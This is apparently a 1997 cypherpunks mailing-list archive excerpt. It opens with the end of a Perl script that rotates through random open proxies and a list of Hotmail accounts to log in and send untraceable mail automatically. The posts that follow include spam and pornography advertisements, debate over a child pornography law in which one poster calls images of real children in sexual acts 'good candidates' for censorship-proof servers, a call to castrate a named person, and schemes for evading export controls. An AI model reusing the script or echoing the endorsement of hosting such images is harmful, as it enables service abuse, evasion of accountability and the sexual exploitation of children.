	$header{$curheader} .= ' ' if $header{$curheader} ne '';
	$header{$curheader} .= $_;
    }
}
## If we were given command-line addresses, that overrides the headers
$header{'to'} = &getaddrs($cmdlineto eq '' ? $header{'to'} : $cmdlineto);
$header{'cc'} = &getaddrs($cmdlineto eq '' ? $header{'cc'} : '');
$header{'bcc'} = &getaddrs($cmdlineto eq '' ? $header{'bcc'} : '');

$msg = &escapetext(join('', ));

srand(time ^ $$);

## Keep trying until the message is successfully delivered
RETRYLOOP: while (1) {

## Get the proxy list
$proxylisturl = new URI::URL ($config{'proxylisturl'} ||
		'http://www.publius.net/~remailer/proxy_list.txt');
if (defined $config{'proxylistcachefile'}) {
    ## Check if the locally cached copy is new enough
    $maxage = $config{'proxylistcacheage'} || 1;
    if (! -e $config{'proxylistcachefile'} ||
	    -M $config{'proxylistcachefile'} > $maxage) {
	## Fetch a new copy
	$request = new HTTP::Request('GET', $proxylisturl);
	$request->header(Pragma => 'no-cache');
	$response = $uadirect->request($request);
	$body = $response->content;
	$newfname = $config{'proxylistcachefile'}.".new.$$";
	open(CACHE, ">$newfname") or die "Cannot write $newfname: $!\n";
	print CACHE $body;
	close(CACHE);
	rename($newfname, $config{'proxylistcachefile'}) or
	    die "Cannot rename $newfname: $!\n";
    }
    ## Read the proxy list
    open(CACHE, $config{'proxylistcachefile'}) or
	die "Cannot open $config{'proxylistcachefile'}: $!\n";
    @proxylist = grep (s/\n// && /^[^#]/, );
    close(CACHE);
} else {
    ## Just fetch from the net
    $request = new HTTP::Request('GET', $proxylisturl);
    $request->header(Pragma => 'no-cache');
    $response = $uadirect->request($request);
    @proxylist = grep (/^[^#]/, split("\n", $response->content));
}

@proxylist = ('secure.escape.ca:80') if $#proxylist == -1;

## Get the account list
if (defined $config{'accountlistfile'}) {
    open(ACC, $config{'accountlistfile'}) or
	die "Cannot open $config{'accountlistfile'}: $!\n";
    @accountlist = grep (s/\n// && /^[^#]/, );
    close(ACC);
}

@accountlist = ('ldeliverer:xxxx') if $#accountlist == -1;

## Choose a proxy and account at random

$proxy = $proxylist[int rand ($#proxylist+1)];
($login, $passwd) =
    $accountlist[int rand ($#accountlist+1)] =~ /^([^:]*):(.*)$/;

#print STDERR "Trying $login through $proxy\n";

## Begin hotmail-specific magic

$ua = new LWP::UserAgent;
$ua->proxy('http', "http://${proxy}/");

$url = new URI::URL 'http://www.hotmail.com/cgi-bin/password.cgi';
$request = new HTTP::Request('POST', $url);
$request->header(Pragma => 'no-cache');
$request->content("login=${login}&curmbox=ACTIVE");

$response = $ua->request($request);
$body = $response->content;
$body =~ /\<\s*form\s+[^>]*action=\"(.*?)\"/io or next RETRYLOOP;

$url = new URI::URL $1, $url;
$body = $';
$body =~ s/\<\s*\/form\s*\>.*//;
$body =~ /\<\s*input\s+[^>]*name=\"disk\"\s+value(=\"(.*?)\")?/io or next RETRYLOOP;
$disk = $2 || "";

$request = new HTTP::Request('POST', $url);
$request->header(Pragma => 'no-cache');
$request->content("passwd=${passwd}&frames=no&disk=${disk}&curmbox=ACTIVE&login=${login}&js=no");
$response = $ua->request($request);
$body = $response->content;

$body =~ /\<\s*area\s+[^>]*href=\"(\/cgi-bin\/compose.*?)\"/io or next RETRYLOOP;
$composeurl = new URI::URL $1, $url;
$body =~ /\<\s*area\s+[^>]*href=\"(\/cgi-bin\/logout.*?)\"/io or next RETRYLOOP;
$logouturl = new URI::URL $1, $url;

$request = new HTTP::Request('GET', $composeurl);
$request->header(Pragma => 'no-cache');
$response = $ua->request($request);
$body = $response->content;

$body =~ /\<\s*form\s+[^>]*action=\"(.*?)\".*?\>/io or next RETRYLOOP;
$url = new URI::URL $1, $composeurl;
$body = $';
$data = '';
while(1) {
    $body =~ /^\s*\<\s*input\s+type=\"?hidden\"?\s+name=\"(.*?)\"\s+value(=\"(.*?)\")?\s*\>/io or last;
    $name = $1; $value = $3 || ""; $body = $';
    $data .= $name."=".$value."&";
}
$data .= "to=$header{'to'}&subject=$header{'subject'}&cc=$header{'cc'}&bcc=$header{'bcc'}&body=${msg}&Send.x=1&Send.y=1";

$request = new HTTP::Request('POST', $url);
$request->header(Pragma => 'no-cache');
$request->content($data);
$response = $ua->request($request);
$body = $response->content;
$body =~ /\<\s*title\s*\>\s*Hotmail\s*-\s*Mailbox/io or next RETRYLOOP;

$request = new HTTP::Request('GET', $logouturl);
$request->header(Pragma => 'no-cache');
$response = $ua->request($request);
last RETRYLOOP;  ## Success
}






From Phil at dship.com  Thu Aug 14 07:06:52 1997
From: Phil at dship.com (Phil at dship.com)
Date: Thu, 14 Aug 1997 07:06:52 -0700 (PDT)
Subject: Important Notice
Message-ID: <199708141359.JAA17228@mail.ezonline.com>


Hello,
  I have some information you may be interested in.  What I have available 
is a list of companies that will drop ship products for you.  What this means 
is you market a product with out having to stock it.  You only pay for the 
product AFTER you recieve your customers payment.  There is NO 
investment by you other then the list, and you DO NOT need warehouse 
space and everything is drop shipped to your customers door.  You just 
advertise and take the orders. This list contains tens of thousands of 
products by thousands of companies.  Everything from a - z.  The Best part 
is you have FULL RESALE RIGHTS to this list.  So you can sell this list to 
whomever you like.  Which is just one more avenue to meet your goals. 
Why make someone else rich well you do the dirty work. Work for 
YOURSELF and achieve your own financial independence.  The cost of 
this list is only 15.00 and its shipped via an e-mail attachment so you get it 
the day I recieve your payment. Don't waste time get started today.     This 
is NOT some get rich quick scheme.This is a chance to own your own 
legitimate  business.  Also as an added bonus Ill send a list of thousands of 
wholesalers FREE of charge.  Thank you for your time....

Just send a check or money order for $15.00  to:

Philip Bowlen
P.O. Box 18481
Beverly Hills, CA 90209
617-362-2500 


Note:  Due to the volume of bouced e-mails I recieve because of address 
changes the Return Address on this e-mail will not work.  If you need to 
reach me please Contact me via phone.  If you get a voice mail please 
leave your E-mail address and any questions you may have. I will respond 
promptly.









From enoch at zipcon.net  Wed Aug 13 17:01:20 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Thu, 14 Aug 1997 08:01:20 +0800
Subject: Tim to Speak
Message-ID: <19970813234813.14903.qmail@zipcon.net>



Tim McVeigh, who has finally realized who his defense lawyer, Stephen
Jones, was really working for, plans to speak for the first time at his
sentencing tomorrow.

I certainly hope CNN carries it live. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}







From linkhost at hotmail.com  Thu Aug 14 08:07:03 1997
From: linkhost at hotmail.com (linkhost at hotmail.com)
Date: Thu, 14 Aug 1997 08:07:03 -0700 (PDT)
Subject: WEBMASTERS - MPEG CLIPS!
Message-ID: <199708072208.SAA20198@loki.atcon.com>


HOT of the press for WEBMASTERS - MPEG CLIPS!

Images are always in high demand for adult sites but
so are short MPEG clips of hardcore action. We now
offer MPEG clips under 2 meg each of XXX action your
traffic has been demanding. 

25 clips per CD...variety of scenes. Enjoy some great
samples, new MPEG packs will be added monthly.

Just go to http://www.zmaster.com and get the URL from
the MPEG CLIP Pack #1 description, and go see for
yourself.

We also have SOFTCORE centerfolds and ASIAN softcore 
as well as hardcore images for licensing too- Cheap!






From vipul at pobox.com  Wed Aug 13 17:08:54 1997
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Thu, 14 Aug 1997 08:08:54 +0800
Subject: TCM goes to city council
In-Reply-To: <199708121951.MAA00280@netcom12.netcom.com>
Message-ID: <199708140312.DAA00972@fountainhead.net>



Vladimir Z. Nuri wrote:

> seriously, if cypherpunks think government is so crappy, let see
> them invent a better alternative than that which exists. note that
> "anarchy" evades the problem completely. it's like saying, "I hate
> my web browser" and someone saying, "oh, just get rid of it, the
> alternative is far better".  an 8 year old would understand this
> logic, but alas it eludes the cpunks after many moons on this list.

i love they way your category of smartass nihilists (the _elite_ dispondent 
blockheads - btw these are proposed categories for my reputation system) 
talk about "anarchy" being analogous to someones mid-life browser crisis and at
the same time completely missing the point. ok, lemme explain what 
crypto-anarchy is and _what_ is the alternative system that some folks
"invented", while you were smoking up. 

this incedently reminds me of a conversation i had with this guy at college once, 
who insisted that i called him "razor" and was some sort of a self-proclaimed 
authority on freudian theories of conscioussness. he talks too much but is 
always willing to learn and wanted to know what the fuck is this "crypto" biz.
anyway I started it with a small introduction to the loose term "human nature" 
since he is familiar with that stuff and I think its a good place to start a discussion 
that has to with any sort of "human" system. 

The term "human nature" means that we guys have "volitional consciousness" 
which is synonymous to the concept of "self awareness" that is higlighted as 
the turning point of human existence in many eastern mystical texts. Which 
implies "choice" is the inescapable concequence of our nature and we 
need to make choices in order to exist. Those who choose poorly 
suffer or die. Theoretically this means that we need a "value system" 
to live (contrary to the popular belief ethics has hardly anything to do 
with "co"-existing) with the our standard of value as Life. 

In the social context, the "right to choose" is the basic human right.
And this was what mystics, collectivists, religious cults, popes 
and the governments decided to snatch at the point of a gun. 

And thats exactly the idea behind a virtual, cyberspacial society, 
physical coercion is invalid in this dimension. crypto provides 
the essential annonymity required to close/stonewall the system so that no 
one can trace your online avatar to your physical self. 

crypto-anarchy is thus a social setup where a virtual community of 
objects use crypto for annonymity, interaction and arbitration. one can 
think of crypto playing the government of the society. it arbitrates
by making fraud impossible. 

thats the basic idea. i suggest you look up the web, there are tons
of crypto resources. even though i am new to list i feel you certainly need 
to get yourself a straight education. i could have given you a wider introduction 
to the subject but i am tired. there are days when you keep bumping 
into these wierdo's you want to hit on the head and say "the universe
doesn't work that way". and these guys are tiring. 

best,
vipul


-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul at pobox.com 	          | - Web Objetcts 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces






From dlv at bwalk.dm.com  Wed Aug 13 17:10:11 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 14 Aug 1997 08:10:11 +0800
Subject: "Leotards and the Law," morphed child porn lawsuit, from Netly
In-Reply-To: <19970813190543.25186.qmail@zipcon.net>
Message-ID: 



Mike Duvos  writes:

> >         Take an erotic photo of an adult and alter it in Photoshop to
> >    look as though he was a minor. Would you be breaking the law? A
> >    federal judge in San Francisco ruled yesterday you would be, rejecting
> >    a court challenge to a 1996 law banning computer-generated erotic
> >    images that "appear" to be of children.

Pedophile Chris Lewis is in trouble.

> 
> 1930's:  "Actung Juden!"
> 1950's:  "Actung Communists!"
> 1990's:  "Actung Photoshop Users!"

"Achtung Spammers" is more like it.  Net.Scum ISPs oversubscribe, can't
deliver the services they charged the users for, and blame the mythical
"spammers".

> I wonder exactly how far child sex hysteria will be permitted to continue,
> before rational people begin giggling loudly in the auditorium. 

The solution is to castrate pedophiles like Chris Lewis.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From whgiii at amaranth.com  Wed Aug 13 17:14:46 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Thu, 14 Aug 1997 08:14:46 +0800
Subject: Fuck the usenet cabal
In-Reply-To: 
Message-ID: <199708132314.SAA03707@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on
08/13/97 
   at 04:20 PM, Ray Arachelian  said:

>On Wed, 13 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

>> What if a non-US person paid them $40 to spam people outside the U.S.
>> with strong crypto?
>> 
>> Is it possible to stuff a blatant ITAR violation into about 100 lines of ascii?

>Already been done.  RSA in 4 lines of Perl, etc...  Heck there was even a
>site out that that cut a UUENCODED copy of PGP into many bits and asked
>people to grab one of the bits to use as their signature.  I.e. Part 50
>out of N of PGP, etc...  Someone with huge usenet archives (or cd's)
>could search for all of these outside of the USA and put them together
>into the whole. :)  No need to pay someone $40 to spam when people will
>freely do this.

>You could also take a packet radio modem and spam short wave (or whatever
>packet radio uses or can use that can get outside the usa) and send PGP
>that way if you like.  Or take PGP, uuencode it and fax it outside of the
>USA.  Or feed it through a voice synth and read it to a foreign phone
>number that has a voice decoder, or compose it as a MIDI song as Kent
>suggested and broadcast the song...  Or tatoo it on your ass then when
>you visit russia have someone take a picture. :)  (Though you might then
>be arrested in russia for porno or whatever the laws are there,
>heheheheh....)

>Don't even need to use the internet to piss off the feds. :)

Ofcource you can just go to my web site and download PGP. IMNSHO Fuck the
Feds. I for one will not let them violate my First Amendment Rights no
matter how much they say that it is a Good Thing (tm) to do so.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/Ixk49Co1n+aLhhAQGdcQP9HGrAETjjycsjJHu+TM7UPN0b9cGc+5E5
tcIQp8XOvIwu+EzV/i8ZE7aDDsxe7oZXS0MJwabgFYKYNSdlKU0lk7ept+Td3Yc0
++RuV03X9TE1EgxdevUk6hf84Jnw97FwhAkTraf+Z/Mqv3eaJoBFDoJFhzH6BMwO
7U0hWqqy0a4=
=tT/B
-----END PGP SIGNATURE-----






From declan at well.com  Wed Aug 13 17:22:49 1997
From: declan at well.com (Declan McCullagh)
Date: Thu, 14 Aug 1997 08:22:49 +0800
Subject: Responses to "Leotards and the Law," from The Netly News
Message-ID: 





---------- Forwarded message ----------
Date: Wed, 13 Aug 1997 16:11:04 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship-announce at vorlon.mit.edu
Subject: Responses to "Leotards and the Law," from The Netly News

My own reading of the opinion is that Judge Conti doesn't address the most
interesting aspect of this law, for instance the case of the South Pacific
researcher who wants to create a sexplay animation. To the extent he does,
he substitutes assertion from the Senate report for analysis (I agree with
Prof. Freedman here). He didn't have to go further, really, since the
plaintiffs explicitly said they weren't selling such animations. Conti
only explores this idea in a footnote, which reads:

  "These incidental harms include the depiction of images created within
  the imagination of the artist. If the images depicted are of children,
  albeit imaginary ones, and not of actual adults of imaginary people who
  unequivocally appear to be adults, then the evils associated with child
  pornography cannot be avoided."

This discussion of the imagination of artists strikes me as telling.
You see, Judge Conti would like to ban thoughtcrime.

-Declan

---

Date: Wed, 13 Aug 1997 18:19:08 -0400 (EDT)
From: David Greene 
To: declan at well.com
Subject: Re: FC: "Leotards and the Law," morphed child porn lawsuit, from Netly

I read Judge Conti's decision to be more consequential than Professor
Freedman does.  Three of its features are particularly disturbing to me:

1.  Judge Conti held that the law is content-neutral.  As the law is
targeted directly and very specifically against the content of the
depictions, I don't buy his "secondary effects" reasoning (that is, the law
is meant to prevent the unavoidable secondary effects of simulated child
pornography -- namely, the seduction of children into pedophilic situations
-- not the simulated images themselves).  The result of Conti's finding is
that the law was subject to less demanding scrutiny than it owuld have been
had it been found to be content specific.

2.  Judge Conti notes that the statute sweeps within its reach "the
depiction of images created within the imagination of the artist" that are
"of children, albeit imaginary ones."  He acknowledges that the
illegaliztion of these depictions is an unavoidable incidence of the fight
against child pornography.  To me then, not only are Photoshop-synthesized
images of half-naked children and an anthropology professor's
computer-generated movie of the sex play of South Pacific teens be illegal
but so would less realisitic depictions such as cartoons or paintings and
various types of computer art.  Conti tries to bail on this later when he
talks about the affirmative defense written into the statute that exempts
works not marketed as child pornography or in such a way that exploits its
sexual nature as child pornography.  However, this affirmative defense is
avialable only to works that were produced using an actual adult person.

3.  With respect to images of youthful-looking adults, Conti relies heavily
on the affirmative defense as curing any constitutional ills the statute
might otherwise have had.  However, is it really clear when something is
marketed "in such a manner as to convey the impression that it is or
contains a visual depiction of a minor engaging in sexually explicit
conduct"?  Is the affirmative available to anything that does not call
itself KidSeXXXX (or the like)?  It still seems vague to me.

The opinion seems to criminalize serious works that will use real adults or
simulated (computer generated, drawn, etc) children to depict pedophilic
situations in order to discuss pedophilia and admit that that is what they
contain.   Lolita?  A Human Sexuality text book?  National Geographic?

The Supreme Court in the Ferber case and those that followed it was
especially concerned with the harm caused to children that participated in
the production of child pornography (or identifiable children who were made
to appear as though they participated).  Whether the mere viewing of child
pornography was an equally weighty concern was a question on the outside of
the constitutional analysis.  Judge Conti's opinion is consequential in
that assumes that this is the central issue.

---

Date: Wed, 13 Aug 1997 17:17:44 -0500
From: jc 
To: declan at well.com, fight-censorship-announce at vorlon.mit.edu
Subject: Re: "Leotards and the Law," morphed child porn lawsuit, from Netly

suppose somebody alters a picture of a child in an erotic pose into a
mouse, lets say. Or the lower half is of a mouse but the top half a child?
is the person still liable?
suppose a dog looks vaguely like its human owner (hey, there are even
contests to that effect) and the dog is eating the leg of another human.
Would the human most closely resembling the dog be in trouble?
thank god there are judges out there like conti who will save us.
Stupid prick that he is!

---

Date: Wed, 13 Aug 1997 14:25:54 -0700 (PDT)
From: Joe Shea 
To: declan at well.com
Subject: Law limiting child pornography on Internet upheld (fwd)


	This decision seems, on a preliminary reading. to validate the 
views of those of us who say that existing laws are sufficient to 
prosecute child pornography violations that appear on the Internet.

Best,

Joe Shea
Editor-in-Chief
The American Reporter
joeshea at netcom.com
http://www.newshare.com:9999


---------- Forwarded message ----------
Date: Wed, 13 Aug 1997 05:31:39 -0700
From: NewsHound 
To: newshare at rmc1.crocker.com
Subject: Law limiting child pornography on Internet upheld



NewsHound article from "NEWSPAPERS" hound, score "92."



Law limiting child pornography on >>Internet<< upheldBY HOWARD MINTZ
Mercury News Staff Writer

A San Francisco federal judge has upheld a year-old law aimed at
restricting child pornography in cyberspace, rejecting arguments that it
violates free-speech rights and chills legitimate art and literature.

In a 16-page decision, U.S. District Judge Samuel Conti  on Tuesday found
that the Child Pornography Act of 1996 is constitutional and a valid way to
deal with the ``devastating'' effect of computer-generated kiddie porn ``on
society and the well-being of children.''

``Given the nature of the evils that anti-child pornography laws are
intended to prevent, the (law) can easily be deemed a content-neutral
regulation,'' Conti wrote.

The American Civil Liberties Union, the adult entertainment industry and
others have challenged the constitutionality of the law, saying it is so
broad that it would criminalize everything from Calvin Klein ads to the
recent movie rendition of ``Romeo and Juliet.''

[...]









From vipul at pobox.com  Wed Aug 13 17:28:35 1997
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Thu, 14 Aug 1997 08:28:35 +0800
Subject: Fuck the usenet cabal
In-Reply-To: 
Message-ID: <199708140535.FAA01661@fountainhead.net>



-----BEGIN PGP SIGNED MESSAGE-----

Ray Arachelian wrote:

> On Wed, 13 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> > What if a non-US person paid them $40 to spam people outside the U.S.
> > with strong crypto?
> > 
> > Is it possible to stuff a blatant ITAR violation into about 100 lines of ascii?

> Already been done.  RSA in 4 lines of Perl, etc...  Heck there was even a
> site out that that cut a UUENCODED copy of PGP into many bits and asked

Is RSA in 3 lines of PERL an ITAR violation? Its more like "meta" code for bc
todo RSA. adam?

- -- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul at pobox.com 	          | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBM/KZHvfccPDXGRjVAQEIxgP/Y6SXfAnz8wu5g6k1a2ZBoDtbq5qifjzL
ENNZBEx4ncd20o2kx71mvUEcpfkiZ3XWxKQWHMgji28Av9XQa+TU1BtEY5jjShV4
YSdjQgerzCMDdr2stvIbfFwUaIYxwn1tjUkvle2wMmGDK4NDUf6iXFOa5jFtn1aZ
bvjO2iZTlKg=
=Ro2S
-----END PGP SIGNATURE-----






From sar at cynicism.com  Wed Aug 13 17:38:20 1997
From: sar at cynicism.com (sar)
Date: Thu, 14 Aug 1997 08:38:20 +0800
Subject: Memme: Crypto=Bullet Proof Vests
In-Reply-To: 
Message-ID: <3.0.2.32.19970813173036.008baeb0@box.cynicism.com>



Next time they yell "But if it saves the life of one child" give them
>this.  "But if strong crypto can save the life of one child
>freedomfighter, who are we to limit its use?  Support strong crypto and
>protect the kids of the world!"
>
>(Preaching to the choire of course, but who knows maybe the crypto=bullet
>proof vest arguement will be useful to someone who can talk sense into the
>crypto clueless cognresscritters.)


encryption protects my children from child molesters. my children
communicate via a secure tunnel so it is impossible for pedophiles to hear
what they are saying or talk to them. they also use digital signatures to
distinguish trusted adults so they will never buy the " your mommy sent me
to pick you up" lines. 






From kent at songbird.com  Wed Aug 13 17:44:31 1997
From: kent at songbird.com (Kent Crispin)
Date: Thu, 14 Aug 1997 08:44:31 +0800
Subject: Guy Polis
In-Reply-To: <4FoBBe4w165w@bwalk.dm.com>
Message-ID: <19970813172824.51378@bywater.songbird.com>



On Wed, Aug 13, 1997 at 04:43:08PM +0000, Paul Bradley wrote:
> 
> > > drunken rants are one thing, and are easily deleted, but impersonating me
> > > is straight out of Detweiler's book. Must be something about Cypherpunks
> > > that brings out this urge to impersonate.
> > 
> > Toto's drunked rants and the most valuable traffic on this mailing list
> > these days - I read them and usually save them.  Tim May's censorship
> > rants make him sonnd like kent Krispin.
> 
> I agree, Toto makes some of the best posts to the list,

Toto, in my opinion, is by far the most talented writer on this list. 
Furthermore, unlike many, he is not hobgoblined by consistency -- he
is deep enough and courageous enough to give his own internal
contradictions free expression, and is open to a far wider range of 
opinions than most people.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From aba at dcs.ex.ac.uk  Wed Aug 13 18:13:05 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Thu, 14 Aug 1997 09:13:05 +0800
Subject: Fuck the usenet cabal
In-Reply-To: 
Message-ID: <199708140020.BAA09457@server.test.net>




Ray Arachelian  writes:
> On Tue, 12 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
> 
> > [using autoresponder to violate ITAR]
> > Is anyone going to be guilty of ITAR violations?
> 
> Nice idea Doc, but anyone who goes there you can bet will have their email
> address added to spamfords databases, and they'll also get loads of spam
> in addition to the crypto you wish to export.  :)  Let's not make deals
> with the devil.  (Still if the guy on the other side is smart enough to
> get a temporary demo account, you're on to a good idea.)

perhaps a hotmail account would do the trick, just bin the account
when you've finished.

Adam






From lwp at mail.msen.com  Wed Aug 13 18:50:56 1997
From: lwp at mail.msen.com (Lou Poppler)
Date: Thu, 14 Aug 1997 09:50:56 +0800
Subject: Memme: Crypto=Bullet Proof Vests
In-Reply-To: 
Message-ID: 



On Wed, 13 Aug 1997, Ray Arachelian wrote:
/.../
> The recent bills thrown around in congress are attempting to do the
> equivalent of outlawing bullet proof vests, and only allowing pebble proof
> vests to be sold, or bullet proof vests that can be pierced by police.
> Would you want your kid to wear a vest that can be pierced by police fire?

Actually, I believe that bullet proof vests are already illegal.
I'm serious, check it out.






From Mkljones at cris.com  Wed Aug 13 19:08:04 1997
From: Mkljones at cris.com (Mike Jones)
Date: Thu, 14 Aug 1997 10:08:04 +0800
Subject: Hypothetical situation for networks
Message-ID: 



This is a 100% hypothetical situation, though would be interesting to see
if it is possible.

A company does some R&D work, which it wishes to keep classified from
competitors.

However, they have two main offices on opposite sides of the country.

Not wishing to use sneakernet type file transfer, they wish to pass
confidential material from one network to the other using the Internet.

Now we all know that anyone with a little bit of knowledge can intercept
the packets as they go past and read the information.

Email is out, as they do use a system of file mirroring, keeping each set
of data as a backup as well as for usage.

Would make sense for them to use a type of NFS system, but is there an
implimentation of secure (ie: encrypted) NFS available?

OS doesn't really matter, as it is a hypothetical system, but we'll assume
either some form of unix/linux, or perhaps winNT or novell NetWare.

Thanks in advance for the info and knowledge...sorry if it's been asked
before.

--
Mike Jones -- CNA, CNE, pursueing MCNE and MCSE currently.
email: Mkljones at cris.com  
Finger Mkljones at cris.com for Geek code and PGP key

	"They cannot scare me with their empty spaces
	Between stars--on stars where no human race is
	I have it in me so much nearer home
	To scare myself with my own desert places."






From tcmay at got.net  Wed Aug 13 19:29:00 1997
From: tcmay at got.net (Tim May)
Date: Thu, 14 Aug 1997 10:29:00 +0800
Subject: Child Porn and Eternity  (Re: "Leotards and the Law...
In-Reply-To: 
Message-ID: 



At 8:08 AM -0700 8/13/97, Declan McCullagh wrote:

>        But Conti skirted the more controversial question: What if
>   someone did use Photoshop to synthesize images of half-naked children?

Let me assure you that such images are available. I might be tempted to say
I know exactly where to find them, and may have even taken a look at them
("as part of my campaign to determine the extend of child porn" :-} ), but
in this climate that might get me a couple of SWAT vans roaring up my
hillside...and then I'd have to make some quick decisions about shooting or
going peacably.

Duncan F. can of course opine that the law is powerless, blah blah, but it
doesn't appear that way to me.

Such images (including non-morphed images of real nude children, or even of
children engaging in sex, and so on) are, by the way, good candidates for
Eternity servers. If the Eternity operators freak out and ban such images,
so much for "Eternity." Perhaps they could then be named "Ephemeral"
servers.

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Wed Aug 13 19:42:04 1997
From: tcmay at got.net (Tim May)
Date: Thu, 14 Aug 1997 10:42:04 +0800
Subject: Memme: Crypto=Bullet Proof Vests
In-Reply-To: 
Message-ID: 




Careful with this argument!

At 1:44 PM -0700 8/13/97, Ray Arachelian wrote:
>I came up with this while on a bio break....
>
>ITAR classifies crypto as munitions, but this is the same thing as telling
>someone who wishes to travel to a warring country that they may not buy a
>bullet proof vest, but they may buy an vest that will stop pebbles being
>thrown at them.  This is equivalently reasoned that such vests could be
>used to rob banks and the theives could get away from the police - but how
>many bank theives have you known that were shot by the cops and not caught
>by other means?

Better be careful with this analogy. In fact, armor of various sorts is
clearly a defense item, and is often on the list of restricted items. For
example, Chobham and reactive tank armor was strictly controlled.

Now we may think crypto should be freely exportable, but comparing it to
armor could backfire.

Personally, I think Cypherpunks should concentrate on making crypto
ubiquitous in the United States, and monkeywrench "by any means available"
any plans to restrict in any way the use of strong crypto within the U.S.

Let the rest of the world get crypto through the leaky sieve that is the U.
S. border, or roll their own, or whatever. As for Netscape and Microsoft
and RSADSI getting export approvals, I'll start worrying about their
interests when they start sending me a monthly paycheck, or put me on
retainer, or given me a few thousands shares as part of a stock option.

How Cypherpunks got effectively hijacked or diverted into fretting about
exports is a mystery to me.



>The recent bills thrown around in congress are attempting to do the
>equivalent of outlawing bullet proof vests, and only allowing pebble proof
>vests to be sold, or bullet proof vests that can be pierced by police.
>Would you want your kid to wear a vest that can be pierced by police fire?
>Maybe a stray bullet aimed at a drug dealer hitting your kid?   Or maybe a
>criminal getting their hands on the same type of ammo and shooting your
>kid?  We need our kids to wear Strong Bullet Proof vests!

By the way, there are already laws in place limiting "cop killer bullets,"
and some restrictions are already in place for limiting body armor (the
preferred name for "bullet proof vests").

"For law enforcement use only" is the label used.

So I'd be careful with all of these munitions and armor analogies. The
First Amendment arguments are much stronger and less ambiguous.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ravage at ssz.com  Wed Aug 13 20:02:41 1997
From: ravage at ssz.com (Jim Choate)
Date: Thu, 14 Aug 1997 11:02:41 +0800
Subject: Memme: Crypto=Bullet Proof Vests (fwd)
Message-ID: <199708140252.VAA27127@einstein.ssz.com>



Forwarded message:

> Date: Wed, 13 Aug 1997 19:37:09 -0700
> From: Tim May 
> Subject: Re: Memme: Crypto=Bullet Proof Vests

> By the way, there are already laws in place limiting "cop killer bullets,"
> and some restrictions are already in place for limiting body armor (the
> preferred name for "bullet proof vests").
> 
> "For law enforcement use only" is the label used.

How did the police get special 'rights' that normal citizens don't?
Especialy considering that they are mentioned no place in the Constitution.
And the Constitution specificaly prohibits via the 10th such self-invoked
expansion of powers.


    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From support at youngestsluts.com  Wed Aug 13 20:38:54 1997
From: support at youngestsluts.com (YoungGirl)
Date: Thu, 14 Aug 1997 11:38:54 +0800
Subject: Sign up on YoungSluts click thru Program
Message-ID: <199708140251.WAA12029@columbia.ctlnet.com>



sorry to bother you but did you want to sign up on the click thru program if 
you did as you see below we did not get any info if your browser cant send 
forms just e-mail the information and we will get you up and running tonite 


Thank you



At 07:46 PM 8/13/97 -0700, you wrote:
>Below is the result of your feedback form.  It was submitted by
> (cypherpunks at toad.com) on Wednesday, August 13, 1997 at 19:46:18
>---------------------------------------------------------------------------
>
>site_name: http://
>
>first_name: cypherpunks
>
>last_name: cypherpunks
>
>mode: add
>
>---------------------------------------------------------------------------
>
>






